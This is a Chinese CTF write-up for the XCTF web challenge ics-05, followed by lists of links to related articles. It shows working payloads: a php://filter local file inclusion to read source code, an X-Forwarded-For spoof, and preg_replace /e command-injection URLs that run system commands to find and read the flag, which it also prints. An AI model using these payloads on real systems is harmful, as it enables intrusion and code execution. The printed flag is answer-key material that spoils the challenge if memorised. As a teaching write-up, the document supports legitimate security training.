本文借鉴以下两篇文章的指导

https://www.jianshu.com/p/5a502873635b

https://blog.csdn.net/about23/article/details/95349625

全部点击一遍,只有这个可以有其他界面

题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统”

在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西

再次点击上面的“云平台设备维护中心”,URL栏有参数?page=index  存在get传值

page的参数联想到可能存在文件包含漏洞

引用上面的文章内容

LFI漏洞的黑盒判断方法:

单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞

输入数字没啥用,尝试读取index.php的源码,采用php伪协议





?page=php://filter/read=convert.base64-encode/resource=index.php




为什么中间要转base64编码,如果不转码,则相当于进行请求网页(继续打开网页)
输入payload得到一段base64




然后解码,分析源码




伪造XFF头来登入系统,同时利用preg_replace函数的漏洞


preg_replace( pattern , replacement , subject ) :


当pre_replace的参数pattern输入/e的时候 ,参数replacement的代码当作PHP代码执行
于是构造payload




/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=123




”+“号在url中会被解释成空格号,这里用%20也行


用burpsuite来设置XFF头




继续查看   %26被url解释成&号   用来连接命令


&& 前面命令为假直接报错,后面语句不执行(前面命令执行成功,后面的命令也执行)




index.php?pat=/123/e&rep=system("cd+./s3chahahaDir/flag%26%26ls")&sub=123






最后的payload




index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123






得flag


cyberpeace{a3f41e3943e9bd48b8084b29e4b27182}





												


											
攻防世界web之ics-05的更多相关文章
	

    
						
  1. CTF--web 攻防世界web题 robots  backup
		
    攻防世界web题 robots https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=506 ...
    
		
    2. 
						
  2. CTF--web 攻防世界web题 get_post
		
    攻防世界web题 get_post https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5 ...
    
		
    3. 
						
  3. 攻防世界 web进阶练习 NewsCenter
		
    攻防世界 web进阶练习 NewsCenter   题目是NewsCenter,没有提示信息.打开题目,有一处搜索框,搜索新闻.考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有 ...
    
		
    4. 
						
  4. XCTF攻防世界Web之WriteUp
		
    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...
    
		
    5. 
						
  5. 攻防世界web新手区
		
    攻防世界web新手区 第一题view_source 第二题get_post 第三题robots 第四题Backup 第五题cookie 第六题disabled_button 第七题simple_js  ...
    
		
    6. 
						
  6. XCTF攻防世界web进阶练习—mfw
		
    XCTF攻防世界web进阶练习-mfw题目为mfw,没有任何提示.直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化查看它的源码,看到有一个?page=fl ...
    
		
    7. 
						
  7. 攻防世界Web刷题记录(进阶区)
		
    攻防世界Web刷题记录(进阶区) 1.baby_web 发现去掉URLhttp://111.200.241.244:51461/1.php后面的1.php,还是会跳转到http://111.200.2 ...
    
		
    8. 
						
  8. 攻防世界Web刷题记录(新手区)
		
    攻防世界Web刷题记录(新手区) 1.ViewSource 题如其名 Fn + F12 2.get post 3.robots robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个 ...
    
		
    9. 
						
  9. 攻防世界Web区部分题解
		
    攻防世界Web区部分题解   前言:PHP序列化就是把代码中所有的 对象 , 类 , 数组 , 变量 , 匿名函数等全部转换为一个字符串 , 提供给用户传输和存储 . 而反序列化就是把字符串重新转换为 ...
    
		
    10. 
						
  10. 攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup
		
    攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup 题目介绍 题目考点 PHP代码审计 git源码泄露 Writeup 进入题目,点击一番,发现可能出现git ...
    
		
    11. 
		

	


随机推荐
	

    
									
  1. MATLAB实例:构造网络连接图(Network Connection)及计算图的代数连通度(Algebraic Connectivity)
			
    MATLAB实例:构造网络连接图(Network Connection)及计算图的代数连通度(Algebraic Connectivity) 作者:凯鲁嘎吉 - 博客园 http://www.cnbl ...
    
			
    2. 
						
  2. pytorch 建立模型的几种方法
			
    利用pytorch来构建网络模型,常用的有如下三种方式 前向传播网络具有如下结构: 卷积层-->Relu层-->池化层-->全连接层-->Relu层 对各Conv2d和Line ...
    
			
    3. 
						
  3. NOIP 2016 玩具谜题
			
    洛谷 P1563 玩具谜题 洛谷传送门 JDOJ 3136: [NOIP2016]玩具谜题 D1 T1 JDOJ传送门 Description 小南有一套可爱的玩具小人, 它们各有不同的职业. 有一天 ...
    
			
    4. 
						
  4. Maven配置教程
			
    Maven的下载 在Maven的官网即可下载,点击访问Apache Maven. 下载后解压即可,解压后目录结构如下: Maven常用配置 在配置之前请将JDK安装好. 1. 环境变量配置 添加M2_ ...
    
			
    5. 
						
  5. jQuery 源码分析(十五) 数据操作模块 val详解
			
    jQuery的属性操作模块总共有4个部分,本篇说一下最后一个部分:val值的操作,也是属性操作里最简单的吧,只有一个API,如下: val(vlaue)        ;获取匹配元素集合中第一个元素的 ...
    
			
    6. 
						
  6. MYSQL 高级语法
			
    1.高级建表和插入 使用creat 和select 进行建表操作,中间采用AS 标识符: CREATE TABLE new_table AS SELECT * FROM exist_table LIM ...
    
			
    7. 
						
  7. 前端之CSS1
			
    CSS基本语法和引入方式 CSS介绍 为了让网页元素的样式更加丰富,也为了让网页的内容和样式能拆分开,CSS由此而诞生,CSS是 Cascading Style Sheets 的首字母缩写,意思是层叠 ...
    
			
    8. 
						
  8. ES6语法:let和const
			
    ES6新增加了两个重要的JavaScript关键字:let和const 一.let关键字 let声明的变量只在let命令所在的代码块内有效. 1.基本语法 let a='123' 2.let和var的 ...
    
			
    9. 
						
  9. Four Ways to Read Configuration Setting in C#(COPY)
			
    Introduction This article will demonstrate us how we can get/read the configuration setting from Web ...
    
			
    10. 
						
  10. tinyriscv---一个从零开始写的极简、易懂的开源RISC-V处理器核
			
    本项目实现的是一个微riscv处理器核(tinyriscv),用verilog语言编写,只求以最简单.最通俗易懂的方式实现riscv指令的功能,因此没有特意去对代码做任何的优化,因此你会看到里面写的代 ...
    
			
    11.